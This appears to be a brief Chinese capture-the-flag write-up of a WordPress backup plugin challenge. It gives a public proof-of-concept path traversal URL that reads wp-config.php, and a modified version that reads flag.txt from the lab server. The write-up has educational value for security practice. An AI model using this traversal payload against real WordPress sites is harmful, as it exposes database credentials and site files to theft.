每日一练
问题
解题
访问web,发现存在插件
搜索公共漏洞,得到poc:[站点]/[路径]/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
修改poc,获取flag.txt:83.136.251.235:31002/wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../flag.txt
总结
唯一的难度在于判断flag在几级目录下。
打赏: 支付宝
本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!